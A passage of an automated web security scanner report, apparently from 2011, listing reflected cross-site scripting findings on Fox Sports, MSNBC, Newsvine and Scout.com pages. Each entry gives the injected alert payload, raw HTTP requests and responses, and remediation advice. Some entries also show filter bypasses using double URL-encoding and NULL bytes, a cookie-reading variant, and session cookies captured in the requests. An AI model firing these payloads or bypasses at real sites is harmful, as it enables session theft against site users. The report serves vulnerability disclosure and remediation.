GET /nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911?ba1f5'-alert(1)-'3ac5f96b8f8=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 223909
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=14
Date: Sat, 29 Jan 2011 23:50:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911?ba1f5'-alert(1)-'3ac5f96b8f8=1';

       startComments('StoryComments', '73'); // load up team comments
   </script>
...[SNIP]...

5.207. http://msn.foxsports.com/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1c3c'-alert(1)-'b04d6cae059 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911?c1c3c'-alert(1)-'b04d6cae059=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 252769
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=23
Date: Sat, 29 Jan 2011 23:50:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911?c1c3c'-alert(1)-'b04d6cae059=1';

       startComments('StoryComments', '26400099'); // load up team comments
   </script>
...[SNIP]...

5.208. http://msn.foxsports.com/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55753'-alert(1)-'d132c7e23c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911?55753'-alert(1)-'d132c7e23c8=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 257888
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=25
Date: Sat, 29 Jan 2011 23:50:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911?55753'-alert(1)-'d132c7e23c8=1';

       startComments('StoryComments', '26409028'); // load up team comments
   </script>
...[SNIP]...

5.209. http://msn.foxsports.com/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc5ba'-alert(1)-'5fa67492e89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911?cc5ba'-alert(1)-'5fa67492e89=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 259129
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=14
Date: Sat, 29 Jan 2011 23:50:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
pt>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911?cc5ba'-alert(1)-'5fa67492e89=1';

       startComments('StoryComments', '26389147'); // load up team comments
   </script>
...[SNIP]...

5.210. http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/ [GT1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/

Issue detail

The value of the GT1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1074'-alert(1)-'88c686acbd7 was submitted in the GT1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002e1074'-alert(1)-'88c686acbd7 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 249591
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=9
Date: Sat, 29 Jan 2011 23:49:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
nURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811?GT1=39002e1074'-alert(1)-'88c686acbd7';

       startComments('StoryComments', '26373068'); // load up team comments
   </script>
...[SNIP]...

5.211. http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fa5f'-alert(1)-'e113a189711 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?2fa5f'-alert(1)-'e113a189711=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 249577
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=48
Date: Sat, 29 Jan 2011 23:50:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
sportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811?2fa5f'-alert(1)-'e113a189711=1';

       startComments('StoryComments', '26373068'); // load up team comments
   </script>
...[SNIP]...

5.212. http://msn.foxsports.com/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0e8c'-alert(1)-'5e2bffdfb2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911?c0e8c'-alert(1)-'5e2bffdfb2d=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 225457
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=39
Date: Sat, 29 Jan 2011 23:50:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911?c0e8c'-alert(1)-'5e2bffdfb2d=1';

       startComments('StoryComments', '26406016'); // load up team comments
   </script>
...[SNIP]...

5.213. http://openchannel.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://openchannel.msnbc.redacted
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52854"><script>alert(1)</script>ae378974d45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?52854"><script>alert(1)</script>ae378974d45=1 HTTP/1.1
Host: openchannel.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:17:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158631

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Open Channel</title>
<met
...[SNIP]...
<a class="vine-customContent-moreLink" href="/?52854"><script>alert(1)</script>ae378974d45=1&nvo=0&20293412|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.214. http://openchannel.msnbc.redacted/_vine/printer [path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://openchannel.msnbc.redacted
Path:   /_vine/printer

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload f4004<img%20src%3da%20onerror%3dalert(1)>4be4a2fbbcf was submitted in the path parameter. This input was echoed as f4004<img src=a onerror=alert(1)>4be4a2fbbcf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=openchannel&path=/f4004<img%20src%3da%20onerror%3dalert(1)>4be4a2fbbcf HTTP/1.1
Host: openchannel.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://openchannel.msnbc.redacted/?52854%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae378974d45=1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SSLB=0; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296392120662

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 15:11:11 GMT
Connection: close
Content-Length: 504

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vin
...[SNIP]...
":{"lgstate":-1,"domainName":null,"displayName":null},"devMachine":false,"section":{"type":"g","contentSetId":"20293412","domainName":"openchannel","displayName":"Open Channel","avatar":null,"path":"\/f4004<img src=a onerror=alert(1)>4be4a2fbbcf"},"revision":"23247"}

5.215. http://photoblog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://photoblog.msnbc.redacted
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5644"><script>alert(1)</script>059427e1b2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f5644"><script>alert(1)</script>059427e1b2e=1 HTTP/1.1
Host: photoblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:18:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 98362

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/?f5644"><script>alert(1)</script>059427e1b2e=1&nvo=0&16164228|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.216. http://photoblog.msnbc.redacted/_vine/printer [path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://photoblog.msnbc.redacted
Path:   /_vine/printer

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload b630a<img%20src%3da%20onerror%3dalert(1)>e5d9d58c461 was submitted in the path parameter. This input was echoed as b630a<img src=a onerror=alert(1)>e5d9d58c461 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=photoblog&path=/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sunb630a<img%20src%3da%20onerror%3dalert(1)>e5d9d58c461 HTTP/1.1
Host: photoblog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:49:39 GMT
Connection: close
Content-Length: 572

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vin
...[SNIP]...
alse,"section":{"type":"g","contentSetId":"16164228","domainName":"photoblog","displayName":"Photoblog","avatar":null,"path":"\/_news\/2011\/01\/ad5b7d32bfbc5f43)(sn=*\/5942494-double-whammy-on-the-sunb630a<img src=a onerror=alert(1)>e5d9d58c461"},"revision":"23247"}

5.217. http://polls.newsvine.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://polls.newsvine.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d374c%253cscript%253ealert%25281%2529%253c%252fscript%253ec34d3a5143c was submitted in the REST URL parameter 1. This input was echoed as d374c<script>alert(1)</script>c34d3a5143c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /d374c%253cscript%253ealert%25281%2529%253c%252fscript%253ec34d3a5143c HTTP/1.1
Host: polls.newsvine.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296400131698

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 15:14:16 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 21174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<div class="vine-tagPage-tagLabel">d374c<script>alert(1)</script>c34d3a5143c</div>
...[SNIP]...

5.218. http://recruiting.scout.com/a.z [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /a.z

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %008759a'-alert(1)-'c462d76badf was submitted in the c parameter. This input was echoed as 8759a'-alert(1)-'c462d76badf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /a.z?s=73&p=9&c=4%008759a'-alert(1)-'c462d76badf&pid=88&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:51:53 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 230 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:01:53 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 212580

<!-- An exception occurred. Described as: Incorrect syntax near '8759'.--><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<h
...[SNIP]...
<!--
function SeasonYearChange() {
document.location.href='/a.z?s=73&p=9&c=4%008759a'-alert(1)-'c462d76badf&pid=88&yr=' + $("#yr").get(0)[$("#yr").get(0).selectedIndex].value;}
//-->
...[SNIP]...

5.219. http://recruiting.scout.com/a.z [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /a.z

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec18c'-alert(1)-'16d2db08aad was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a.z?s=73&p=9&c=4ec18c'-alert(1)-'16d2db08aad&pid=88&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=153805115.1296350458.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=153805115.697096863.1296350458.1296350458.1296350458.1; SessionBrandId=0; __utmc=153805115; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=153805115.1.10.1296350458;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:23:06 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.186 in 269 ms
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:33:05 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 212480

<!-- An exception occurred. Described as: Incorrect syntax near 'c18c'.--><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<h
...[SNIP]...
<!--
function SeasonYearChange() {
document.location.href='/a.z?s=73&p=9&c=4ec18c'-alert(1)-'16d2db08aad&pid=88&yr=' + $("#yr").get(0)[$("#yr").get(0).selectedIndex].value;}
